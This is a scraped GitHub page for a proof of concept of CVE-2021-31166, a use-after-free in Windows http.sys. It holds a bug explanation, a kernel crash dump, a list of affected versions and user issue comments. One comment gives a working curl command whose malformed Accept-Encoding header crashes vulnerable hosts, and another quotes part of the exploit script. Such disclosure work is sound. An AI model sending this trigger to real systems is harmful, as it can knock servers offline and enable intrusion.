Proof of concept for CVE-2021-31166, a remote HTTP.sys use-after-free triggered remotely.

Last update: Dec 18, 2022

Overview

CVE-2021-31166: HTTP Protocol Stack Remote Code Execution Vulnerability

This is a proof of concept for CVE-2021-31166 ("HTTP Protocol Stack Remote Code Execution Vulnerability"), a use-after-free dereference in http.sys patched by Microsoft in May 2021. According to this tweet the vulnerability has been found by @_mxms and @fzzyhd1.

The bug itself happens in http!UlpParseContentCoding where the function has a local LIST_ENTRY and appends item to it. When it's done, it moves it into the Request structure; but it doesn't NULL out the local list. The issue with that is that an attacker can trigger a code-path that frees every entries of the local list leaving them dangling in the Request object.

Here is the bugcheck:

KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x00000139
                       (0x0000000000000003,0xFFFFF90EA867EE40,0xFFFFF90EA867ED98,0x0000000000000000)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff804`19410c50 cc              int     3

kd> kp
 # Child-SP          RetAddr               Call Site
00 fffff90e`a867e368 fffff804`19525382     nt!DbgBreakPointWithStatus
01 fffff90e`a867e370 fffff804`19524966     nt!KiBugCheckDebugBreak+0x12
02 fffff90e`a867e3d0 fffff804`19408eb7     nt!KeBugCheck2+0x946
03 fffff90e`a867eae0 fffff804`1941ad69     nt!KeBugCheckEx+0x107
04 fffff90e`a867eb20 fffff804`1941b190     nt!KiBugCheckDispatch+0x69
05 fffff90e`a867ec60 fffff804`19419523     nt!KiFastFailDispatch+0xd0
06 fffff90e`a867ee40 fffff804`1db3f677     nt!KiRaiseSecurityCheckFailure+0x323
07 fffff90e`a867efd0 fffff804`1daf6c05     HTTP!UlFreeUnknownCodingList+0x63
08 fffff90e`a867f000 fffff804`1dacd201     HTTP!UlpParseAcceptEncoding+0x299c5
09 fffff90e`a867f0f0 fffff804`1daa93d8     HTTP!UlAcceptEncodingHeaderHandler+0x51
0a fffff90e`a867f140 fffff804`1daa8ab7     HTTP!UlParseHeader+0x218
0b fffff90e`a867f240 fffff804`1da04c5f     HTTP!UlParseHttp+0xac7
0c fffff90e`a867f3a0 fffff804`1da0490a     HTTP!UlpParseNextRequest+0x1ff
0d fffff90e`a867f4a0 fffff804`1daa48c2     HTTP!UlpHandleRequest+0x1aa
0e fffff90e`a867f540 fffff804`1932ae85     HTTP!UlpThreadPoolWorker+0x112
0f fffff90e`a867f5d0 fffff804`19410408     nt!PspSystemThreadStartup+0x55
10 fffff90e`a867f620 00000000`00000000     nt!KiStartSystemThread+0x28

kd> !analyze -v
[...]
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

KERNEL_SECURITY_CHECK_FAILURE (139)
A kernel component has corrupted a critical data structure.  The corruption
could potentially allow a malicious user to gain control of this machine.
Arguments:
Arg1: 0000000000000003, A LIST_ENTRY has been corrupted (i.e. double remove).
Arg2: fffff90ea867ee40, Address of the trap frame for the exception that caused the BugCheck
Arg3: fffff90ea867ed98, Address of the exception record for the exception that caused the BugCheck
Arg4: 0000000000000000, Reserved

Frequently Asked Questions

Q: Is Windows Remote Management (WinRM) affected?

Yes (thanks to @JimDinMN for sharing his experiments).

Q: Is Web Services on Devices (WSDAPI) affected?

Yes (thanks to @HenkPoley for sharing his results).

Q: What are the affected versions of Windows?

According to Microsoft's documentation, here are the affected platforms:

Windows Server, version 2004 (or 20H1) (Server Core installation),
Windows 10 Version 2004 (or 20H1) for ARM64/x64/32-bit Systems,
Windows Server, version 20H2 (Server Core Installation),
Windows 10 Version 20H2 for ARM64/x64/32-bit Systems.

Comments

SyntaxError: invalid syntax

D:\git\Vulnerability\CVE\CVE-2021-31166>C:\python27\python.exe cve-2021-31166.py --target=172.23.240.1 File "cve-2021-31166.py", line 9 r = requests.get(f'http://{args.target}/', headers = { ^ SyntaxError: invalid syntax

D:\git\Vulnerability\CVE\CVE-2021-31166>

opened by kouzhudong 5
Connection timed out

On Linux the command python3 cve-2021-31166.py --target=192.168.0.112 hangs then fails with connection timed out error. Target is a Windows 10 20H2 64 bit machine that (I believe) wasn't updated in 3 weeks. Does that mean it isn't vulnerable?

opened by trivia211 4
Update cve-2021-31166.py

Hello dear friend, I have to admit that the idea for this exploit is simply brilliant. Dear friend, I've made a little update, for this good decision... If you want it of course... KR @nu11secur1ty S.A.I.E

opened by nu11secur1ty 3
Could you possibly mentioned version number?

I am using Windows 10 Version IIS version 20H2 for x64 Systems. and when I am trying PoC and perdform manually using burpsuit. It is showing 400 response. Could you help me out?

Version details

PoC

opened by PunitTailor55 3
Hello! OS Windows-Server-2016-Standard, try: python3 cve-2021-31166.py --target X.X.X.X But <Responce [200]>. This is because OS not from trouble list: Windows Server version 2004 (or 20H1) , Windows 10 Version 2004 (or 20H1), Windows Server, version 20H2, Windows 10 Version 20H2?

opened by Nik100 1
Question - Comment
I think you can use curl to exploit as well. Likely local privilege escalation, since a normal user can register a listener on a high port.

$listener = New-Object System.Net.HttpListener $listener.Prefixes.Add('http://localhost:8080/') $listener.Start() curl.exe -H 'Accept-Encoding: doar-e, ftw, imo, ,' http://localhost:8080/

Also which tool are you using to reverse with, for the images? Very cool

Cheers
opened by ghost 1

Releases(v1)

v1(May 21, 2021)

http.sys (for Windows 2004 x64) after the April 2021 Update & http.sys (for Windows 2004 x64) after the May 2021 Update.
Source code(tar.gz)
Source code(zip)
win_2004.http.rel0421.sys(1.50 MB)
win_2004.http.rel0521.sys(1.50 MB)

Owner

Axel Souchet

GitHub Repository

Proof of concept for CVE-2021-31166, a remote HTTP.sys use-after-free triggered remotely.

Related tags

Overview

CVE-2021-31166: HTTP Protocol Stack Remote Code Execution Vulnerability

Frequently Asked Questions

Comments

SyntaxError: invalid syntax

Connection timed out

Update cve-2021-31166.py

Could you possibly mentioned version number?

Question - Comment

Releases(v1)

v1(May 21, 2021)

Owner

Axel Souchet

Malware Configuration And Payload Extraction

MSDorkDump is a Google Dork File Finder that queries a specified domain name and variety of file extensions

Obfuscated Gradients Give a False Sense of Security: Circumventing Defenses to Adversarial Examples

利用NTLM Hash读取Exchange邮件

EyeJo是一款自动化资产风险评估平台，可以协助甲方安全人员或乙方安全人员对授权的资产中进行排查，快速发现存在的薄弱点和攻击面。

:closed_lock_with_key: multi factor authentication system (2FA, MFA, OTP Server)

CVE-2021-22986 & F5 BIG-IP RCE

An automated, reliable scanner for the Log4Shell (CVE-2021-44228) vulnerability.

Statistical Random Number Generator Attack Against The Kirchhoff-law-johnson-noise (Kljn) Secure Key Exchange Protocol

Gitlab RCE - Remote Code Execution

Script to calculate Active Directory Kerberos keys (AES256 and AES128) for an account, using its plaintext password

SARA - Simple Android Ransomware Attack

Phoenix Framework is an environment for writing, testing and using exploit code.

A black hole for Internet advertisements

(D)arth (S)ide of the (L)og4j (F)orce, the ultimate log4j vulnerabilities assessor

Webpack自动化信息收集

Simples brute forcer de diretorios para web pentest.

IDA scripts for hypervisor (Hyper-v) analysis and reverse engineering automation

NExfil is an OSINT tool written in python for finding profiles by username.

Python Password Generator